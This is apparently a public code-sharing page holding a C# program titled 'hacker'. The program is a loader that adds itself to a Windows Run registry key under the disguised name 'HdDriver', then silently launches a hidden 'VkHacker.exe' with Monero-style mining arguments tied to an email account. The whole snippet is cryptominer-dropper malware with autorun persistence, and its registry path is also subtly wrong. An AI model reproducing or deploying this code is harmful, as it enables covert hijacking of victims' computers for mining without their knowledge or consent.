Run Code
|
API
|
Code Wall
|
Users
|
Misc
|
Feedback
|
Login
|
Theme
|
Privacy
|
Blog
hacker
using System; using System.Windows.Forms; using Microsoft.Win32; using System.IO; using System.Diagnostics; namespace Loader { public partial class Form1 : Form { const string name = "HdDriver"; public bool SetAutorunValue(bool autorun) { string ExePath = System.Windows.Forms.Application.ExecutablePath; RegistryKey reg; reg = Registry.CurrentUser.CreateSubKey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"); try { if (autorun) reg.SetValue(name, ExePath); else reg.DeleteValue(name); reg.Close(); } catch { return false; } return true; } public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { SetAutorunValue(true); try { Process _proc = new Process(); _proc.StartInfo.Arguments = "-user super.vitalui@mail.ru -xmr 2"; _proc.StartInfo.CreateNoWindow = true; _proc.StartInfo.UseShellExecute = false; _proc.StartInfo.FileName = @"%Temp%\VkHacker.exe"; _proc.Start(); } catch(Exception ex) { } Application.Exit(); } } }
run
|
edit
|
history
|
help
0
Please
log in
to post a comment.
Melody
sample
Finonacci Series
Fórum ➡ Finding STRONG tags that contain UL tags, using Regex class♦
Public access specifier
532
Project1
extrefGenerate
Сортировка массива
Tarkov Time
Please log in to post a comment.